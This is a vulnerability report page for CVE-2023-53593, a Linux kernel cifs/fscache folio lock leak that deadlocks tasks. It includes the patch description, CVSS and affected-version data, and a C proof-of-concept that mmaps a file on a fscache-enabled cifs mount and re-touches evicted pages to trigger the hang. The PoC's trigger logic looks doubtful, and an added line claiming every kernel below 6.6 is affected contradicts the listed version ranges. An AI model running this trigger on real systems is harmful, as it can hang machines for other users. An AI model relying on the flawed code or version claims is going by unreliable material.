Security Vulnerability Report
CVE-2023-53593 CVSS 5.5 MEDIUM

CVE-2023-53593

Published: 2025-10-04 16:15:56
Last Modified: 2026-03-21 00:51:34
Source: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

Description

In the Linux kernel, the following vulnerability has been resolved:

cifs: Release folio lock on fscache read hit.

Under the current code, when cifs_readpage_worker is called, the call contract is that the callee should unlock the page. This is documented in the read_folio section of Documentation/filesystems/vfs.rst as:

> The filesystem should unlock the folio once the read has completed,
> whether it was successful or not.

Without this change, when fscache is in use and a cache hit occurs during a read, the page lock is leaked, producing the following stack on subsequent reads (via mmap) to the page:

$ cat /proc/3890/task/12864/stack
[<0>] folio_wait_bit_common+0x124/0x350
[<0>] filemap_read_folio+0xad/0xf0
[<0>] filemap_fault+0x8b1/0xab0
[<0>] __do_fault+0x39/0x150
[<0>] do_fault+0x25c/0x3e0
[<0>] __handle_mm_fault+0x6ca/0xc70
[<0>] handle_mm_fault+0xe9/0x350
[<0>] do_user_addr_fault+0x225/0x6c0
[<0>] exc_page_fault+0x84/0x1b0
[<0>] asm_exc_page_fault+0x27/0x30

This requires a reboot to resolve; it is a deadlock.

Note however that the call to cifs_readpage_from_fscache does mark the page clean, but does not free the folio lock. This happens in __cifs_readpage_from_fscache on success. Releasing the lock at that point however is not appropriate, as cifs_readahead also calls cifs_readpage_from_fscache and *does* unconditionally release the lock after its return. This change therefore effectively makes cifs_readpage_worker work like cifs_readahead.

CVSS Details

CVSS Score
5.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H
Exploitability Score
1.8
Impact Score
3.6
Weakness
NVD-CWE-noinfo

Configurations (Affected Products)

cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* (from 5.17.1, before 6.1.47) - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* (from 6.2, before 6.4.12) - VULNERABLE
cpe:2.3:o:linux:linux_kernel:5.17:-:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:5.17:rc3:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:5.17:rc4:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:5.17:rc5:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:5.17:rc6:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:5.17:rc7:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:5.17:rc8:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:6.5:rc1:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:6.5:rc2:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:6.5:rc3:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:6.5:rc4:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:6.5:rc5:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:6.5:rc6:*:*:*:*:*:* - VULNERABLE
Linux Kernel < 6.6 (all versions in which the cifs module has fscache enabled)
Linux Kernel stable branch: apply patch 69513dd669e243928f7450893190915a88f84a2b
Linux Kernel stable branch: apply patch 7a9fb689c1a1dc373887621a3bfa3810df0abde4
Linux Kernel stable branch: apply patch 9e725386d4262ef23ae51993f04602bc535b5be2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
C
// PoC for CVE-2023-53593 - Linux kernel cifs fscache folio lock leak
// This PoC demonstrates how to trigger the deadlock condition
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/mman.h>
#include <sys/stat.h>

#define FILE_SIZE (4096 * 10) // 10 pages
#define PAGE_SIZE 4096

int main(int argc, char *argv[])
{
    if (argc != 2) {
        fprintf(stderr, "Usage: %s <cifs_mounted_file>\n", argv[0]);
        fprintf(stderr, "Note: Requires cifs mount with fscache enabled\n");
        return 1;
    }

    const char *filepath = argv[1];
    int fd;
    void *mapped;

    // Step 1: Open the file on a cifs mount with fscache enabled
    fd = open(filepath, O_RDONLY);
    if (fd < 0) {
        perror("open");
        return 1;
    }

    // Step 2: mmap the file to trigger the filemap_fault path
    mapped = mmap(NULL, FILE_SIZE, PROT_READ, MAP_PRIVATE, fd, 0);
    if (mapped == MAP_FAILED) {
        perror("mmap");
        close(fd);
        return 1;
    }

    // Step 3: First read - triggers cifs_readpage_worker with fscache miss
    // This populates the fscache
    printf("First access (fscache miss) - reading page...\n");
    volatile char c = ((char *)mapped)[0];
    (void)c;

    // Step 4: Drop the page from page cache to force fscache re-fetch
    // On next access, fscache hit occurs, triggering the bug
    printf("Dropping page cache to force fscache hit on next access...\n");
    if (posix_fadvise(fd, 0, FILE_SIZE, POSIX_FADV_DONTNEED) != 0) {
        perror("posix_fadvise");
    }

    // Step 5: Second access via mmap - triggers fscache cache hit
    // This is where the folio lock leak occurs
    printf("Second access (fscache hit) - this triggers the lock leak...\n");
    // Touch the page to trigger filemap_fault -> filemap_read_folio
    c = ((char *)mapped)[0];
    (void)c;

    // Step 6: Third access - the page is now locked, causing deadlock
    printf("Third access - system may hang here due to deadlock...\n");
    c = ((char *)mapped)[0];
    (void)c;

    printf("If you see this, the bug was not triggered.\n");
    munmap(mapped, FILE_SIZE);
    close(fd);
    return 0;
}

/*
 * Trigger conditions:
 * 1. Linux kernel with cifs module compiled with fscache support
 * 2. A cifs filesystem mounted with -o fsc (fscache enabled)
 * 3. Local user access to files on the cifs mount
 * 4. File must be read at least once (to populate fscache)
 * 5. Page cache must be evicted (fscache hit on re-read)
 * 6. Subsequent mmap access will deadlock
 *
 * To mount with fscache:
 * mount -t cifs -o fsc,username=user,password=pass //server/share /mnt/cifs
 *
 * After triggering, check the stuck task:
 * cat /proc/<pid>/task/<tid>/stack
 * Expected output shows deadlock in folio_wait_bit_common
 */

References

https://git.kernel.org/stable/c/69513dd669e243928f7450893190915a88f84a2b (Patch)
https://git.kernel.org/stable/c/7a9fb689c1a1dc373887621a3bfa3810df0abde4 (Patch)
https://git.kernel.org/stable/c/9e725386d4262ef23ae51993f04602bc535b5be2 (Patch)

Raw JSON Data
